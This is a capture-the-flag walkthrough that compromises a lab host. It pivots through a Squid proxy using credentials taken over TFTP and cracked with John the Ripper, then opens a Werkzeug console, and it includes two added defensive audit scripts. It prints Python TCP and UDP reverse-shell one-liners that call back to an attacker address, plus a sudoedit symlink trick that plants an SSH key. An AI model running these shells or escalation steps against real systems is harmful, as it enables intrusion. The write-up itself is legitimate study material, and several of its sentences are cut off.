Starting with reconnaissance on host 10.10.10.21, using Nmap we have:
In parallel I fired UDP Proto Scanner and, putting all the results together, there is a Squid proxy on port 3128 and TFTP on port 69 open.
Finally, with Nikto (nikto -h http://10.10.10.21:3128) we get loads of results, all of them false positives.
In order to access or scan the website we have to proxy our requests through Squid. There are a few ways of connecting or scanning through the Squid proxy:
1. Using the Metasploit module squid_pivot_scanning
2. Using nikto -h IP -useproxy http://10.10.10.21:3128
3. Using Burp Suite's upstream proxy
However, in order to use Nikto or Burp we need to find the Squid proxy's credentials first.
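The reason the proxy matters here is its http_access policy: Squid evaluates the rules top to bottom, the first line whose ACLs all match decides, and a request matching no line gets the opposite of the last rule's action. A forward proxy that allows authenticated users to reach any destination also lets them reach 127.0.0.1, which is exactly what turns a stolen proxy password into access to the box's loopback-only services. The following is an added example, not the machine's real squid.conf: a small evaluator for a subset of Squid's ACL language (src, dst and proxy_auth) run against two constructed config fragments, a weak one and a hardened one that denies to_localhost before allowing authenticated users. ACL names, client address and both configs are constructed for the demo.

```python
import ipaddress

# Two constructed squid.conf fragments (added example, not the machine's real file).
# Squid predefines `all`, `localhost` and `to_localhost`; to_localhost is written
# out here so the evaluator needs no built-ins beyond `all`.
WEAK_CONF = """
acl to_localhost dst 127.0.0.0/8
acl authed proxy_auth REQUIRED
http_access allow authed
http_access deny all
"""

HARDENED_CONF = """
acl to_localhost dst 127.0.0.0/8
acl authed proxy_auth REQUIRED
http_access deny to_localhost
http_access allow authed
http_access deny all
"""


def parse_conf(text):
    """Collect `acl` definitions and `http_access` rules from a squid.conf fragment."""
    acls, rules = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        words = line.split()
        if words[0] == "acl":
            # repeated `acl NAME ...` lines extend the same ACL (OR semantics)
            acls.setdefault(words[1], []).append((words[2], words[3:]))
        elif words[0] == "http_access":
            rules.append((words[1] == "allow", words[2:]))
    return acls, rules


def acl_matches(acls, name, req):
    """Subset of Squid ACL types: src, dst (CIDR lists) and proxy_auth."""
    if name == "all":
        return True
    for kind, args in acls[name]:
        if kind in ("src", "dst"):
            addr = ipaddress.ip_address(req[kind])
            if any(addr in ipaddress.ip_network(a, strict=False) for a in args):
                return True
        elif kind == "proxy_auth":
            # simplification: real Squid answers 407 and challenges the client
            # when the user is not authenticated yet; here it is a plain boolean
            if req["authenticated"]:
                return True
        else:
            raise ValueError("unsupported acl type: " + kind)
    return False


def decide(acls, rules, req):
    """First-match evaluation of http_access lines; `!name` negates an ACL."""
    for allow, names in rules:
        if all(acl_matches(acls, n.lstrip("!"), req) != n.startswith("!") for n in names):
            return allow
    # no rule matched: Squid applies the opposite of the last rule's action
    return not rules[-1][0] if rules else False


def loopback_reachable(conf_text, client="10.10.14.5"):
    """True if an authenticated client (constructed address) can proxy to 127.0.0.1."""
    acls, rules = parse_conf(conf_text)
    return decide(acls, rules, {"src": client, "dst": "127.0.0.1", "authenticated": True})


if __name__ == "__main__":
    print("weak config lets authed users reach loopback:", loopback_reachable(WEAK_CONF))
    print("hardened config lets authed users reach loopback:", loopback_reachable(HARDENED_CONF))
```

The point the check makes is ordering: in the hardened fragment the deny for to_localhost sits above the allow for authenticated users, so even a valid credential cannot be used to pivot to services bound to 127.0.0.1. Put the same deny ahead of any broad allow in a real squid.conf and keep the passwords file out of anything an unauthenticated service like TFTP can serve.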
So, searching for information about Squid Proxy I found 
and through TFTP (port 69) I got the squid.conf file using get /etc/squid/squid.conf or just get squid.conf, since we are in the squid directory.
Reading and searching online for how Squid Proxy stores passwords, I saw that there is a file at /etc/squid/passwords in which the Squid Proxy password is stored. We have
kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l
Using John the Ripper and the rockyou.txt list to crack the basic auth password we get kalamari and ihateseafood. So now that we have the username and password, let's move on to log in and scan the host with Nikto. First of all, in Burp you have to set up an upstream proxy to connect to the website through the Squid proxy.
Now, we can access the host through 127.0.0.1.
You can also run Dirbuster.
Try to access 127.0.0.1 and you will see http://127.0.0.1/console, where you can execute Python commands:
I tried passing a Python reverse shell from Pentestmonkey 
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("ipaddress",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
but I experienced a lot of crashes, so I tried a reverse shell using UDP:
import subprocess; subprocess.Popen(["python", "-c", 'import os; import pty; import socket; s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM); s.connect((\"ipaddress\", 443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv(\"HISTFILE\",\"/dev/null\"); pty.spawn(\"/bin/sh\"); s.close()'])
Normally, to catch a reverse UDP connection I would use nc -nlvup 443, but I used  instead, a reverse TTY shell. This will allow me to use nano.
So, I am logged in as werkzeug and I need to escalate privileges to get to the user flag. If I fire sudo -l I get:
Apparently, werkzeug can use sudoedit as alekos without a password:
sudoedit -u alekos /var/www/*/*/layout.html
The idea is to create a file at /var/www/testing/x/layout.html, paste our SSH key into /home/alekos/.ssh/authorized_keys and then log in via SSH as the alekos user.
1. Create a folder /var/www/testing/x and in there create a file named layout.html
2. We now have /var/www/testing/x/layout.html
3. Create a symbolic link: ln -s /var/www/testing/x/layout.html /home/alekos/.ssh/authorized_keys
4. Edit layout.html using sudoedit -u alekos /var/www/*/*/layout.html and add your SSH key
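From the administrator's side, the weakness is a sudoedit rule whose path contains wildcards under a directory the low-privilege user can write to: the user controls which file the glob resolves to, and a symlink placed there lets the edit land on a file owned by the run-as user. As an added example that is not part of the writeup, the script below audits sudoers text for sudoedit rules with glob characters and then walks the glob on a filesystem to flag matching entries that resolve outside the pattern's fixed prefix. The sudoers lines other than the sudoedit one, the temp-directory tree and all paths are constructed for the demo; the rule regex only handles the `user host=(runas) [TAG:] command` form shown.

```python
import glob
import os
import re
import tempfile

# Constructed sudoers lines for this example; only the sudoedit rule mirrors
# the one reported by `sudo -l` in the writeup, the others are invented.
SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
werkzeug ALL=(alekos) NOPASSWD: sudoedit /var/www/*/*/layout.html
deploy   ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart nginx
"""

# user host=(runas) [TAG: ...] command[, command...]  (runas parens required here)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
GLOB_CHARS = set("*?[")


def find_wildcard_sudoedit(sudoers_text):
    """Return (user, runas, path) for every sudoedit rule whose path uses glob characters."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m.group("cmds").split(","):
            words = spec.split()
            if len(words) >= 2 and words[0] == "sudoedit":
                for path in words[1:]:
                    if GLOB_CHARS & set(path):
                        findings.append((m.group("user"), m.group("runas"), path))
    return findings


def fixed_prefix(pattern):
    """Directory part of a glob pattern before its first wildcard component."""
    fixed = []
    for part in pattern.split(os.sep):
        if GLOB_CHARS & set(part):
            break
        fixed.append(part)
    return os.sep.join(fixed) or os.sep


def escaping_matches(pattern, root=os.sep):
    """Paths matching `pattern` (rooted at `root`) whose real path leaves the fixed prefix."""
    prefix = os.path.realpath(os.path.join(root, fixed_prefix(pattern).lstrip(os.sep)))
    rooted = os.path.join(root, pattern.lstrip(os.sep))
    bad = []
    for match in glob.glob(rooted):
        real = os.path.realpath(match)   # follows symlinks in every component
        if not real.startswith(prefix + os.sep):
            bad.append((match, real))
    return bad


def build_demo_tree():
    """Constructed filesystem in a temp dir: one honest layout.html and one symlinked one."""
    root = tempfile.mkdtemp(prefix="sudoedit-audit-")
    web = os.path.join(root, "var/www/testing/x")
    ssh = os.path.join(root, "home/alekos/.ssh")
    legit = os.path.join(root, "var/www/legit/site")
    for d in (web, ssh, legit):
        os.makedirs(d)
    open(os.path.join(legit, "layout.html"), "w").close()
    open(os.path.join(ssh, "authorized_keys"), "w").close()
    os.symlink(os.path.join(ssh, "authorized_keys"), os.path.join(web, "layout.html"))
    return root


if __name__ == "__main__":
    for finding in find_wildcard_sudoedit(SUDOERS):
        print("wildcard sudoedit rule:", finding)
    demo_root = build_demo_tree()
    for match, real in escaping_matches("/var/www/*/*/layout.html", demo_root):
        print("escapes fixed prefix:", match, "->", real)
```

The durable fix is to drop the wildcard and list the exact files the user may edit, or move the editable files out of any directory that user can write to; running the audit against the live sudoers file together with its web root turns the symlink trick into a finding rather than a surprise.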
Now, in order to create our SSH key we need to:
1. Go to /root/.ssh
2. Type ssh-keygen in the terminal and hit enter (we do not need a passphrase)
3. Then cat the id_rsa.pub file and paste it into /var/www/testing/x/layout.html using nano
So, we can log in through SSH with ssh -i id_rsa email@example.com and read the
To get root we need to follow the steps described in , 4.3 Tar arbitrary command execution.